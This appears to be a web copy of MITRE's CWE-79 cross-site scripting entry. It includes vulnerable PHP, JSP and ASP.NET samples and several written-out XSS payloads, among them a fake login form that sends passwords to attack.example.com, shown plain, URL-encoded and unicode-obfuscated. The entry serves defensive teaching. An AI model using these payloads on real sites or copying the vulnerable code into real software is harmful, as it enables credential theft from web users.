CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Description

The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

There are many variants of cross-site scripting, characterized by a variety of terms or involving different attack topologies. However, they all indicate the same fundamental weakness: improper neutralization of dangerous input between the adversary and a victim.

☞

XSS Vulnerability Explained

Read our in-depth guide on exploiting and mitigating this weakness

Potential Impact

Access Control, Confidentiality

Bypass Protection Mechanism, Read Application Data

Integrity, Confidentiality, Availability

Execute Unauthorized Code or Commands

Confidentiality, Integrity, Availability, Access Control

Execute Unauthorized Code or Commands, Bypass Protection Mechanism, Read Application Data

Demonstrative Examples

The following code displays a welcome message on a web page based on the HTTP GET username parameter (covers a Reflected XSS (Type 1) scenario).

Bad

$username = $_GET['username'];echo '<div class="header"> Welcome, ' . $username . '</div>';

Because the parameter can be arbitrary, the url of the page could be modified so $username contains scripting syntax, such as

Attack

http://trustedSite.example.com/welcome.php?username=<Script Language="Javascript">alert("You've been attacked!");</Script>

This results in a harmless alert dialog popping up. Initially this might not appear to be much of a vulnerability. After all, why would someone enter a URL that causes malicious code to run on their own computer? The real danger is that an attacker will create the malicious URL, then use e-mail or social engineering tricks to lure victims into visiting a link to the URL. When victims click the link, they unwittingly reflect the malicious content through the vulnerable web application back to their own computers.

More realistically, the attacker can embed a fake login box on the page, tricking the user into sending the user's password to the attacker:

Attack

http://trustedSite.example.com/welcome.php?username=<div id="stealPassword">Please Login:<form name="input" action="http://attack.example.com/stealPassword.php" method="post">Username: <input type="text" name="username" /><br/>Password: <input type="password" name="password" /><br/><input type="submit" value="Login" /></form></div>

If a user clicks on this link then Welcome.php will generate the following HTML and send it to the user's browser:

Result

<div class="header"> Welcome, <div id="stealPassword"> Please Login:
                        <form name="input" action="attack.example.com/stealPassword.php" method="post">Username: <input type="text" name="username" /><br/>Password: <input type="password" name="password" /><br/><input type="submit" value="Login" /></form>
                     </div></div>

The trustworthy domain of the URL may falsely assure the user that it is OK to follow the link. However, an astute user may notice the suspicious text appended to the URL. An attacker may further obfuscate the URL (the following example links are broken into multiple lines for readability):

Attack

trustedSite.example.com/welcome.php?username=%3Cdiv+id%3D%22stealPassword%22%3EPlease+Login%3A%3Cform+name%3D%22input%22+action%3D%22http%3A%2F%2Fattack.example.com%2FstealPassword.php%22+method%3D%22post%22%3EUsername%3A+%3Cinput+type%3D%22text%22+name%3D%22username%22+%2F%3E%3Cbr%2F%3EPassword%3A+%3Cinput+type%3D%22password%22+name%3D%22password%22+%2F%3E%3Cinput+type%3D%22submit%22+value%3D%22Login%22+%2F%3E%3C%2Fform%3E%3C%2Fdiv%3E%0D%0A

The same attack string could also be obfuscated as:

Attack

trustedSite.example.com/welcome.php?username=<script+type="text/javascript">document.write('\u003C\u0064\u0069\u0076\u0020\u0069\u0064\u003D\u0022\u0073\u0074\u0065\u0061\u006C\u0050\u0061\u0073\u0073\u0077\u006F\u0072\u0064\u0022\u003E\u0050\u006C\u0065\u0061\u0073\u0065\u0020\u004C\u006F\u0067\u0069\u006E\u003A\u003C\u0066\u006F\u0072\u006D\u0020\u006E\u0061\u006D\u0065\u003D\u0022\u0069\u006E\u0070\u0075\u0074\u0022\u0020\u0061\u0063\u0074\u0069\u006F\u006E\u003D\u0022\u0068\u0074\u0074\u0070\u003A\u002F\u002F\u0061\u0074\u0074\u0061\u0063\u006B\u002E\u0065\u0078\u0061\u006D\u0070\u006C\u0065\u002E\u0063\u006F\u006D\u002F\u0073\u0074\u0065\u0061\u006C\u0050\u0061\u0073\u0073\u0077\u006F\u0072\u0064\u002E\u0070\u0068\u0070\u0022\u0020\u006D\u0065\u0074\u0068\u006F\u0064\u003D\u0022\u0070\u006F\u0073\u0074\u0022\u003E\u0055\u0073\u0065\u0072\u006E\u0061\u006D\u0065\u003A\u0020\u003C\u0069\u006E\u0070\u0075\u0074\u0020\u0074\u0079\u0070\u0065\u003D\u0022\u0074\u0065\u0078\u0074\u0022\u0020\u006E\u0061\u006D\u0065\u003D\u0022\u0075\u0073\u0065\u0072\u006E\u0061\u006D\u0065\u0022\u0020\u002F\u003E\u003C\u0062\u0072\u002F\u003E\u0050\u0061\u0073\u0073\u0077\u006F\u0072\u0064\u003A\u0020\u003C\u0069\u006E\u0070\u0075\u0074\u0020\u0074\u0079\u0070\u0065\u003D\u0022\u0070\u0061\u0073\u0073\u0077\u006F\u0072\u0064\u0022\u0020\u006E\u0061\u006D\u0065\u003D\u0022\u0070\u0061\u0073\u0073\u0077\u006F\u0072\u0064\u0022\u0020\u002F\u003E\u003C\u0069\u006E\u0070\u0075\u0074\u0020\u0074\u0079\u0070\u0065\u003D\u0022\u0073\u0075\u0062\u006D\u0069\u0074\u0022\u0020\u0076\u0061\u006C\u0075\u0065\u003D\u0022\u004C\u006F\u0067\u0069\u006E\u0022\u0020\u002F\u003E\u003C\u002F\u0066\u006F\u0072\u006D\u003E\u003C\u002F\u0064\u0069\u0076\u003E\u000D');</script>

Both of these attack links will result in the fake login box appearing on the page, and users are more likely to ignore indecipherable text at the end of URLs.

The following code displays a Reflected XSS (Type 1) scenario.

The following JSP code segment reads an employee ID, eid, from an HTTP request and displays it to the user.

Bad

<% String eid = request.getParameter("eid"); %>...Employee ID: <%= eid %>

The following ASP.NET code segment reads an employee ID number from an HTTP request and displays it to the user.

Bad

<%protected System.Web.UI.WebControls.TextBox Login;protected System.Web.UI.WebControls.Label EmployeeID;...EmployeeID.Text = Login.Text;%>
                     <p><asp:label id="EmployeeID" runat="server" /></p>

The code in this example operates correctly if the Employee ID variable contains only standard alphanumeric text. If it has a value that includes meta-characters or source code, then the code will be executed by the web browser as it displays the HTTP response.

The following code displays a Stored XSS (Type 2) scenario.

The following JSP code segment queries a database for an employee with a given ID and prints the corresponding employee's name.

Bad

<%Statement stmt = conn.createStatement();ResultSet rs = stmt.executeQuery("select * from emp where id="+eid);if (rs != null) {rs.next();String name = rs.getString("name");}%>
                     Employee Name: <%= name %>

The following ASP.NET code segment queries a database for an employee with a given employee ID and prints the name corresponding with the ID.

Bad

<%protected System.Web.UI.WebControls.Label EmployeeName;...string query = "select * from emp where id=" + eid;sda = new SqlDataAdapter(query, conn);sda.Fill(dt);string name = dt.Rows[0]["Name"];...EmployeeName.Text = name;%><p><asp:label id="EmployeeName" runat="server" /></p>

This code can appear less dangerous because the value of name is read from a database, whose contents are apparently managed by the application. However, if the value of name originates from user-supplied data, then the database can be a conduit for malicious content. Without proper input validation on all data stored in the database, an attacker can execute malicious commands in the user's web browser.

The following code consists of two separate pages in a web application, one devoted to creating user accounts and another devoted to listing active users currently logged in. It also displays a Stored XSS (Type 2) scenario.

CreateUser.php

Bad

$username = mysql_real_escape_string($username);$fullName = mysql_real_escape_string($fullName);$query = sprintf('Insert Into users (username,password) Values ("%s","%s","%s")', $username, crypt($password),$fullName) ;mysql_query($query);/.../

The code is careful to avoid a SQL injection attack (CWE-89) but does not stop valid HTML from being stored in the database. This can be exploited later when ListUsers.php retrieves the information:

ListUsers.php

Bad

$query = 'Select * From users Where loggedIn=true';$results = mysql_query($query);
                     if (!$results) {exit;}
                     
                     //Print list of users to page
                     echo '<div id="userlist">Currently Active Users:';while ($row = mysql_fetch_assoc($results)) {echo '<div class="userNames">'.$row['fullname'].'</div>';}echo '</div>';

The attacker can set their name to be arbitrary HTML, which will then be displayed to all visitors of the Active Users page. This HTML can, for example, be a password stealing Login message.

Mitigations & Prevention

Architecture and Design

Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482]. Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.

ImplementationArchitecture and Design

Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies. For any data that will be output to another web page, especi

Architecture and DesignImplementation Limited

Understand all the potential areas where untrusted inputs can enter your software: parameters or arguments, cookies, anything read from the network, environment variables, reverse DNS lookups, query results, request headers, URL components, e-mail, files, filenames, databases, and any external systems that provide data to the application. Remember that such inputs may be obtained indirectly through API calls.

Architecture and Design

For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.

Architecture and Design

If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated.

Implementation

Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even

Implementation

With Struts, write all data from form beans with the bean's filter attribute set to true.

Implementation Defense in Depth

To help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XmlHttpRequest and other powerful browser technologi

Implementation

Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across relat

Architecture and Design

When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs.

Detection Methods

Automated Static Analysis Moderate — Use automated static analysis tools that target this type of weakness. Many modern techniques use data flow analysis to minimize the number of false positives. This is not a perfect solution, since 100% accuracy and coverage are not feasible, especially when multiple components are involved.
Black Box Moderate — Use the XSS Cheat Sheet [REF-714] or automated test-generation tools to help launch a wide variety of attacks against your web application. The Cheat Sheet contains many subtle XSS variations that are specifically targeted against weak XSS defenses.

Real-World CVE Examples

CVE ID	Description
CVE-2024-49038	XSS in AI assistant
CVE-2024-54142	Plugin that enables AI features allows input with html entities, leading to XSS
CVE-2021-25926	Python Library Manager did not sufficiently neutralize a user-supplied search term, allowing reflected XSS.
CVE-2021-25963	Python-based e-commerce platform did not escape returned content on error pages, allowing for reflected Cross-Site Scripting attacks.
CVE-2021-1879	Universal XSS in mobile operating system, as exploited in the wild per CISA KEV.
CVE-2020-3580	Chain: improper input validation (CWE-20) in firewall product leads to XSS (CWE-79), as exploited in the wild per CISA KEV.
CVE-2014-8958	Admin GUI allows XSS through cookie.
CVE-2017-9764	Web stats program allows XSS through crafted HTTP header.
CVE-2014-5198	Web log analysis product allows XSS through crafted HTTP Referer header.
CVE-2008-5080	Chain: protection mechanism failure allows XSS
CVE-2006-4308	Chain: incomplete denylist (CWE-184) only checks "javascript:" tag, allowing XSS (CWE-79) using other tags
CVE-2007-5727	Chain: incomplete denylist (CWE-184) only removes SCRIPT tags, enabling XSS (CWE-79)
CVE-2008-5770	Reflected XSS using the PATH_INFO in a URL
CVE-2008-4730	Reflected XSS not properly handled when generating an error message
CVE-2008-5734	Reflected XSS sent through email message.

Showing 15 of 20 observed examples.

Taxonomy Mappings

PLOVER: — Cross-site scripting (XSS)
7 Pernicious Kingdoms: — Cross-site Scripting
CLASP: — Cross-site scripting
OWASP Top Ten 2007: A1 — Cross Site Scripting (XSS)
OWASP Top Ten 2004: A1 — Unvalidated Input
OWASP Top Ten 2004: A4 — Cross-Site Scripting (XSS) Flaws
WASC: 8 — Cross-site Scripting
Software Fault Patterns: SFP24 — Tainted input to command
OMG ASCSM: ASCSM-CWE-79 —

Frequently Asked Questions

What is CWE-79?

CWE-79 (Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')) is a software weakness identified by MITRE's Common Weakness Enumeration. It is classified as a Base-level weakness. The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

How can CWE-79 be exploited?

Attackers can exploit CWE-79 (Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')) to bypass protection mechanism, read application data. This weakness is typically introduced during the Implementation phase of software development.

How do I prevent CWE-79?

Key mitigations include: Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482]. Examples of libraries and fr

What is the severity of CWE-79?

CWE-79 is classified as a Base-level weakness (Medium abstraction). It has been observed in 20 real-world CVEs.

Description

XSS Vulnerability Explained

Potential Impact

Access Control, Confidentiality

Integrity, Confidentiality, Availability

Confidentiality, Integrity, Availability, Access Control

Demonstrative Examples

Mitigations & Prevention

Detection Methods

Real-World CVE Examples

Related Weaknesses

CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')

CWE-494: Download of Code Without Integrity Check

CWE-352: Cross-Site Request Forgery (CSRF)

Taxonomy Mappings

Frequently Asked Questions